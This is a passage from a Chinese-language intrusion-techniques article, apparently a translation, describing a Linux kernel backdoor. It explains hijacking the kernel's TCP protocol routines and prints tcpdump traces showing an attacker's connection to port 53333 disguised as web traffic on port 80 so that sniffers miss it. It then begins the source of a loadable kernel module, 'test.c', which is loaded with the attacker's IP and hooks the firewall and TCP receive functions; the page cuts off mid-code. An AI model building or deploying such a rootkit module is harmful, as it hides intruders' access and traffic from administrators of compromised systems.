1. 替换协议例程来改变发送数据包。
在linux内核中,每个BSD socket 在内核结构中实际上是一对socket/sock。发送数据包的例程是利用sock结构中的tcp_opt*成员来实现的, 轮流使用af_specific成员。有意思的是这里所有的ipv4都使用相同的地址, 例如, 所有的af_specific 将指向同样的内核地址, 这个结构地址保存了一个例程集合。我们怎么在"tcp_func"这个实力中修改函数地址呢?
方法很简单, 但实现起来却不那么容易。因为没有一个很简单的方法去得到那个结构的地址。一个可能的方法是:
从进程链表(任务结构链表)中找出它打开的文件; 然后从这些文件中找出实际指向socket的地址; 从socket可以得到sock结构地址; 最后获得"ipv4_specific"的地址。
我们来理顺以下上面所说的流程: task -> files_struct
-> file -> inode -> socket -> sock -> tcp_opt -> tcp_func.
其他的方法就更加困难和危险了。这个灵感是来自于[6]。我们可以通过搜索内核内存来找到我们要的明确的函数地址。然后修改内核内存。首先我们跳转到我们代码的地址然后跳回常规例程。
2. 从web服务器和从网络工作站上的流量监听。
在这段中, mamet是一个装了我们的后门的服务器且leone是一个攻击者。
开始的tcpdump输出纪录了除了mamet之外的一些网络工作站的流量。我们可以烦先这时正常的。leone的2603端口 和mamet的80端口的通信:
14:16:27.214888 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: S
3840116896:3840116896(0) win 32120 <mss 1460,sackOK,timestamp 14616818
0,nop,wscale 0> (DF)
14:16:27.215190 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: S
3561828491:3561828491(0) ack 3840116897 win 32120 <mss 1460,sackOK,timestamp
1547802 14616818,nop,wscale 0> (DF)
14:16:27.215336 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: .
1:1(0) ack 1 win 32120 <nop,nop,timestamp 14616819 1547802> (DF)
14:16:27.313396 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P
1:39(38) ack 1 win 32120 <nop,nop,timestamp 1547812 14616819> (DF)
14:16:27.313539 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: .
1:1(0) ack 39 win 32120 <nop,nop,timestamp 14616828 1547812> (DF)
14:16:30.166613 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: P
1:6(5) ack 39 win 32120 <nop,nop,timestamp 14617114 1547812> (DF)
14:16:30.166895 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: .
39:39(0) ack 6 win 32120 <nop,nop,timestamp 1548097 14617114> (DF)
14:16:30.190287 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P
39:127(88) ack 6 win 32120 <nop,nop,timestamp 1548099 14617114> (DF)
14:16:30.205280 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: .
6:6(0) ack 127 win 32120 <nop,nop,timestamp 14617118 1548099> (DF)
14:16:30.205548 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P
127:157(30) ack 6 win 32120 <nop,nop,timestamp 1548101 14617118>
(DF)14:16:30.225281 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: .
6:6(0) ack 157 win 32120 <nop,nop,timestamp 14617120 1548101> (DF)
14:16:35.664222 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: P
6:17(11) ack 157 win 32120 <nop,nop,timestamp 14617663 1548101> (DF)
14:16:35.676943 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P
157:236(79) ack 17 win 32120 <nop,nop,timestamp 1548648 14617663> (DF)
14:16:35.695279 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: .
17:17(0) ack 236 win 32120 <nop,nop,timestamp 14617667 1548648> (DF)
14:16:35.695561 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P
236:266(30) ack 17 win 32120 <nop,nop,timestamp 1548650 14617667> (DF)
14:16:35.715282 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: .
17:17(0) ack 266 win 32120 <nop,nop,timestamp 14617669 1548650> (DF)
14:16:40.099813 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: P
17:23(6) ack 266 win 32120 <nop,nop,timestamp 14618107 1548650> (DF)
14:16:40.103771 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P
266:300(34) ack 23 win 32120 <nop,nop,timestamp 1549091 14618107> (DF)
14:16:40.115282 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: .
23:23(0) ack 300 win 32120 <nop,nop,timestamp 14618109 1549091> (DF)
14:16:42.196173 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: P
23:30(7) ack 300 win 32120 <nop,nop,timestamp 14618317 1549091> (DF)
14:16:42.199260 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: F
300:300(0) ack 30 win 32120 <nop,nop,timestamp 1549300 14618317>
(DF)14:16:42.199399 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: .
30:30(0) ack 301 win 32120 <nop,nop,timestamp 14618317 1549300> (DF)
14:16:42.199806 eth0 > leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.www: F
30:30(0) ack 301 win 32120 <nop,nop,timestamp 14618317 1549300> (DF)
14:16:42.200052 eth0 < mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: .
301:301(0) ack 31 win 32120 <nop,nop,timestamp 1549300 14618317> (DF)
这儿是在服务器上收集的同一会话的跟踪线索。 当用lenone的2603端口来试图和mamet的53333端口通信时,这看起来好像比较奇怪。 这儿有一些外来的数据包,实际上它们是被修改过的。
14:12:16.042692 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: S
3840116896:3840116896(0) win 32120 <mss 1460,sackOK,timestamp 14616818
0,nop,wscale 0> (DF)
14:12:16.042844 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: S
3561828491:3561828491(0) ack 3840116897 win 32120 <mss 1460,sackOK,timestamp
1547802 14616818,nop,wscale 0> (DF)
14:12:16.043136 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: .
3840116897:3840116897(0) ack 3561828492 win 32120 <nop,nop,timestamp 14616819
1547802> (DF)
14:12:16.141022 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P
1:39(38) ack 1 win 32120 <nop,nop,timestamp 1547812 14616819> (DF)
14:12:16.141340 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: .
0:0(0) ack 39 win 32120 <nop,nop,timestamp 14616828 1547812> (DF)
14:12:18.994434 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: P
0:5(5) ack 39 win 32120 <nop,nop,timestamp 14617114 1547812> (DF)
14:12:18.994567 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: .
39:39(0) ack 6 win 32120 <nop,nop,timestamp 1548097 14617114> (DF)
14:12:19.017933 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P
39:127(88) ack 6 win 32120 <nop,nop,timestamp 1548099 14617114> (DF)
14:12:19.033100 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: .
5:5(0) ack 127 win 32120 <nop,nop,timestamp 14617118 1548099> (DF)
14:12:19.033222 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P
127:157(30) ack 6 win 32120 <nop,nop,timestamp 1548101 14617118>
(DF)14:12:19.053099 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: .
5:5(0) ack 157 win 32120 <nop,nop,timestamp 14617120 1548101> (DF)
14:12:24.492064 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: P
5:16(11) ack 157 win 32120 <nop,nop,timestamp 14617663 1548101> (DF)
14:12:24.504619 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P
157:236(79) ack 17 win 32120 <nop,nop,timestamp 1548648 14617663> (DF)
14:12:24.523115 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: .
16:16(0) ack 236 win 32120 <nop,nop,timestamp 14617667 1548648> (DF)
14:12:24.523259 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P
236:266(30) ack 17 win 32120 <nop,nop,timestamp 1548650 14617667> (DF)
14:12:24.543124 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: .
16:16(0) ack 266 win 32120 <nop,nop,timestamp 14617669 1548650> (DF)
14:12:28.927675 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: P
16:22(6) ack 266 win 32120 <nop,nop,timestamp 14618107 1548650> (DF)
14:12:28.931467 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: P
266:300(34) ack 23 win 32120 <nop,nop,timestamp 1549091 14618107> (DF)
14:12:28.943147 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: .
22:22(0) ack 300 win 32120 <nop,nop,timestamp 14618109 1549091> (DF)
14:12:31.024044 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: P
22:29(7) ack 300 win 32120 <nop,nop,timestamp 14618317 1549091> (DF)
14:12:31.026978 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: F
300:300(0) ack 30 win 32120 <nop,nop,timestamp 1549300 14618317>
(DF)14:12:31.027268 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: .
29:29(0) ack 301 win 32120 <nop,nop,timestamp 14618317 1549300> (DF)
14:12:31.027669 eth0 < leone.cs.ucsb.edu.2603 > mamet.cs.ucsb.edu.53333: F
29:29(0) ack 301 win 32120 <nop,nop,timestamp 14618317 1549300> (DF)
14:12:31.027780 eth0 > mamet.cs.ucsb.edu.www > leone.cs.ucsb.edu.2603: .
301:301(0) ack 31 win 32120 <nop,nop,timestamp 1549300 14618317> (DF)
如果你有足够的创造力, 你甚至可以让sniffer不能sniffer到你的通信。在这个例子中, 在mamet上的sniffer将不能看到来自于leone机器的网络连接。
3. file "test.c"
/*
* Compile:
* gcc -O2 -c test.c -I/usr/src/linux/include -fomit-frame-pointer
*
* Usage:
* insmod test.o ip=128.111.48.44
* here ip is the attacker’s IP and must be in numeric format
*/
#define MODULE
#define __KERNEL__
#include <linux/config.h>
#include <linux/module.h>
#include <linux/version.h>
#include <linux/skbuff.h>
#include <net/protocol.h>
#include <linux/netdevice.h>
#include <net/pkt_sched.h>
#include <net/tcp.h>
#include <net/ip.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/icmp.h>
#include <linux/firewall.h>
#include <linux/kernel.h>
#include <linux/mm.h>
#include <linux/file.h>
#include <asm/uaccess.h>
/* Define here if you want to swap ports also */
#define REALPORT 53333 /* port you which to communicate */
#define FAKEPORT 80 /* port that appears on the wire */
int my_tcp_v4_rcv(struct sk_buff *skb, unsigned short len);
__u32 in_aton(const char *);
int my_default_firewall(struct firewall_ops *this, int pf,
struct device *dev, void *phdr, void *arg, struct sk_buff **skb);
int my_call_out_firewall(struct firewall_ops *this, int pf,
struct device *dev, void *phdr, void *arg, struct sk_buff **skb);
unsigned long int magic_ip;
char *ip;
MODULE_PARM(ip, "s");
struct inet_protocol *original_tcp_protocol;
struct inet_protocol my_tcp_protocol =
{
&my_tcp_v4_rcv,
NULL,
NULL,
IPPROTO_TCP,
0,
NULL,
"TCP"
};
/*
* <linux/firewall.h>
*
* 18 struct firewall_ops
* 19 {
* 20 struct firewall_ops *next;
* 21 int (*fw_forward)(struct firewall_ops *this, int pf,
* 22 struct device *dev, void *phdr, void *arg, struct sk_buff **pskb);
* 23 int (*fw_input)(struct firewall_ops *this, int pf,
* 24 struct device *dev, void *phdr, void *arg, struct sk_buff **pskb);
* 25 int (*fw_output)(struct firewall_ops *this, int pf,
* 26 struct device *dev, void *phdr, void *arg, struct sk_buff **pskb);
* 27 / * Data falling in the second 486 cache line isn’t used directly
* 28 during a firewall call and scan, only by insert/delete and other
* 29 unusual cases
* 30 * /
* 31 int fw_pf; / * Protocol family * /
* 32 int fw_priority; / * Priority of chosen firewalls * /
* 33 };
上一页 1 2 3 下一页 |
安全中国首页 > 文章中心 > 入侵技术